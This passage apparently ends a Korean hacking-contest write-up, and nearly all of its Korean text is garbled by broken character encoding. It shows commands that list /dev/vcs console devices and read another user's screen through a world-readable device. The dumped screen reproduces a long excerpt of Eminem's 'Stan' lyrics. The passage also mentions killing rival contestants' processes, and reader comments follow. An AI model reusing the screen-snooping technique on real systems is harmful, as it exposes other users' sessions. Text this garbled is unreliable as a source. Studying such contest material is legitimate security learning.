ÀÖ´Ù. (¿©±â¼ `vcs'´Â °¡»ó ÄÜ¼Ö ½ºÅ©¸°ÀÇ ¾àÀÚÀÌ´Ù.)
ÀÌ°ÍÀ»
»ç¿ëÇϸé
ÄÜ¼Ö ½ºÅ©¸°ÀÇ ¿À¸¥ÂÊ À§¿¡ ÇöÀç ½Ã°£À» Ç¥½ÃÇÏ´Â ½Ã°è
ÇÁ·Î±×·¥À»
½ÇÇà½Ãų ¼ö ÀÖ´Ù. (kbd-0.95.tar.gv¿¡ ÀÖ´Â vcstime
ÇÁ·Î±×·¥À»
ÂüÁ¶Ç϶ó.) ´ÜÁö ³»¿ë¸¸À» ´ýÇÁÇÏ·Á¸é, cat /dev/vcsNÀ̶ó°í
Çصµ
µÈ´Ù. ÀÌ·¯ÇÑ µð¹ÙÀ̽º ÈÀÏ/dev/vcsN¿¡´Â newlineµµ »ö°ú
°°Àº
¼Ó¼ºµµ
¾ø´Ù. Á» ´õ ³ªÀº ÇÁ·Î±×·¥À¸·Î´Â /dev/vcsaN°¡ ÀÖ´Ù. (vcsa:
`virtual
console screen with attributes') ÀÌ ÇÁ·Î±×·¥Àº Çà°ú
¿ÀÇ ¼ö,
Ä¿¼ÀÇ
À§Ä¡¸¦ ´ãÀº Çì´õ·Î ½ÇÇà½ÃŲ´Ù. vcs(4)¸¦ ÂüÁ¶Ç϶ó.
ÂüÁ¶¹®¼:
http://kldp.org/HOWTO/Keyboard-and-Console-HOWTO
|
<Ãë¾à
µð¹ÙÀ̽º ã±â>
bash-2.05a$
ls -al /dev/vcs*
crw--w----
1 vcsa tty 7, 0 Apr 11 10:25 /dev/vcs
crw--w-r--
1 vcsa tty 7, 1 Apr 11 10:25 /dev/vcs1
crw--w----
1 vcsa tty 7, 10 Apr 11 10:25 /dev/vcs10
{Áß·«}
|
<½ºÅ©¸°
´ýÇÁ ³»¿ë>
bash-2.05a$
cat /dev/vcs1
[Eminem
as 'Stan']
Dear
Slim, I wrote but you still ain't callin
I
left my cell, my pager, and my home phone at the bottom
I
sent two letters back in autumn, you must not-a got
'em
There
probably was a problem at the post office or somethin
Sometimes
I scribble addresses too sloppy when I jot 'em
but
anyways; fuck it, what's been up? Man how's your daughter?
My
girlfriend's pregnant too, I'm bout to be a father
If
I have a daughter, guess what I'ma call her?
I'ma
name her Bonnie
I
read about your Uncle Ronnie too I'm sorry
I
had a friend kill himself over some bitch who didn't
want him
I
know you probably hear this everyday, but I'm your biggest
fan
I
even got the underground shit that you did with Scam
I
got a room full of your posters and your pictures man
I
like the shit you did with Ruckus too, that shit was
fat
Anyways,
I hope you get this man, hit me back,
just
to chat, truly yours, your biggest fan
This
is Stan
|
4.
Èıâ.
±ÛÁß¿¡¼
½ÇÁ¦ °ø°ÝÇÑ ½Ã°£°ú ÀÚ·áÁ¤¸®ÇÑ ½Ã°£¿¡¼ Á¶±Ý Â÷ÀÌ°¡ ÀÖÀ»¼ö ÀÖ½À´Ï´Ù.
Index.htmlÀ»
°¡Áö±â À§Çؼ ´Ù¸¥ Âü°¡ÀÚ¸¦ Kill ½ÃÅ°´Âµ¥..
ÀÌ·±¹æ¹ýÀº
Á¶±Ý ÀÚÁ¦¸¦ ÇØ¾ß ÇÏÁö ¾ÊÀ»±î..
À̹ø´ëȸ¸¦
ÅëÇؼ ¸øǬ ¹®Á¦µµ ÀÖ¾ú°í..
¸¹ÀÌ
¹è¿ü½À´Ï´Ù.
ÁÁÀº
´ëȸ °¨»çÇÕ´Ï´Ù.
[º°Ã·.1]
³ªÁß¿¡ °ø°³µÈ ¼Ò½º.
o.
walwal ·¹º§ÀÇ tmpwatch source. [
¸µÅ© ]
o.
guta ·¹º§ÀÇ student source. [
¸µÅ© ]
o.
mungmung ·¹º§ÀÇ Use_Brain source. [
¸µÅ© ]
[º°Ã·.2]
o.
tmpwatch Ãë¾àÁ¡ ¹ßÇ¥ÀÚ·á. [
¸µÅ© ]
**
ÀÔ»óÀÚ¿¡°Ô ÇѸ¶µð!! **
½Ã¶ó¼Ò´Ï : ´ë´ÜÇØ¿ä.. ³ª´Â ¾ðÁ¦ Àú·¸°ÔµÉ±î..? . ¸Û¸Û : ¹®Á¦ ¸ø Ǫ½ÅºÐµé. À§ ³»¿ëÀ» ¹«ÀÛÁ¤ µû¶óÇØ º¸´Â °Íµµ µµ¿òÀÌ µÉ°Å¿¡¿ä~ . d1212 : 0x80485a5 : call 0x80483dc . d1212 : À̰͵µ ¾¾¾ð¾î?? . ÄÄ¸Í : ³ ¾ðÁ¦ obj¸¦ º¼¼ö ÀÖÀ»±î??? . d1212 : 0x0020 8011 16b0 4d2a 0000 0101 080a 0f65 221c ....M*....... . d1212 : À̰ŵµ¿©?? ±×·³ ÇØÅ· ÇÒ·Á¸é ¾î¼Àµµ ¹è¿ö¾ß Çϳª¿© . therock : ¿ª½Ã ´ë´ÜÇÑ null@root !! . 2121d : ±âº»ÀûÀÎ ¾î¼À ÇÊ¿äÇÕ´Ï´Ù. . 11 : ¿ä¹ø¿¡ 1µîÇÑ ÆÀ null@root ¾Æ´Ï´øµ¥..À̸§ºÎÅÍ Æ²¸°µ¥ . Anesra : ÃàÇϵ帳´Ï´Ù.^^..Àúµµ ¸¹ÀÌ°øºÎÇؾ߰ڳ׿ä.:) . 1212312 : null@root ±×·ì Á¤¿¹¸â¹ö¶ø´Ï´Ù. . µðÆ潺 : ¿ì¾Æ . Final_fire : ¾ÕÀ¸·Î´Â gdb »ç¿ë¹ýÁ» ¾Ë¾ÆºÁ¾ß°Ú±º¿ä..^^ . Nuno : ÃàÇϵå·Á¿ä... ºÎ»óÀÌ ¹¹ÁÒ?...^^ . ±¸»ß : ÀߺýÀ´Ï´Ù.. . ¾Æ¿À¸® : ÀúµÎ¿ä^^ . Rantert : ÁÁÀº°Å Çϳª ¹è¿ü½À´Ï´Ù. ^^ . Hero : ¸Ó³Ä°í ÀÌ°Ô -_-¸Ö ¾Ë¾Æ µé¾î¾ß ÇÏÁö ''a . Åä½Ã : (-_-)==b . ¼º¿õ : ³ªµµ Àü¿¡ ½ÃÀÛÇß´Ù°¡ Æ÷±âÇߴµ¥ ´Ù½Ã ½ÃÀÛÇؾ߰ڴç.. . Max : µµ¿òÀÌ ¸¹ÀÌ µÇ¾ú½À´Ï´Ù. gdb¸¦ ³Ê¹« Àß ½á¼ ºÎ·´³×¿ä. . Ãʺ¸ : --b Á¤¸» ´ë´ÜÇϳ׿© ±Ùµ¥ ¸Õ³»¿ëÀÎÁö... . sophier : ¾î¼Àºí¸®¾î¶ó... ¿©ÇÏÆ° Àß ºÃ½À´Ï´Ù^^ . include : ½Ç·Î ´ë´ÜÇϽʴϴÙ.:-_ . Ãʺ¸´Ù : Àß ¹è¿ü½À´Ï´Ù..(-_-)-b . bestbox : Ä£ÀýÇÏ°í ÀÚ¼¼ÇÑ ¼³¸í °í¸¿½À´Ï´Ù . nary : ´ë´ÜÇϽʴ̴Ù-¤±-³ª´É¾ðÁ¦ÀúÄɵDZî.. . ttpp : ³Î·çÆ® ¸¸¼¼~ . ±èºÀö : À½ ´ë´ÜÇϽó׿ä . ¸Ó³Ä°í¿ä : ÁøÂ¥ Àå³¾ÈÇÏ°í ÇѱÛÀÚµµ ¸ð¸£°Ú´Ù ¤Ñ¤Ñ . ¸ð·¡°í·¡ : ´ë´ÜÇϳ×..¾î¼Àºí¸®¾î..¸ÚÀֳ׿ä¾ÕÀ¸·Îµµ ¸ÚÁø ¸ð½À ±â´ëÇÏ°Ú½À´Ï´Ù.^-^* . ´©±¸°Ô : ¾ÆÀÌÁã¿£ÇÇ . blackangel : Âü ´ë´ÜÇϽó׿ä...¤Ì¤Ñ¤Ì....ºÎ·´½À´Ï´Ù .
|
À̸§
: ³»¿ë :
|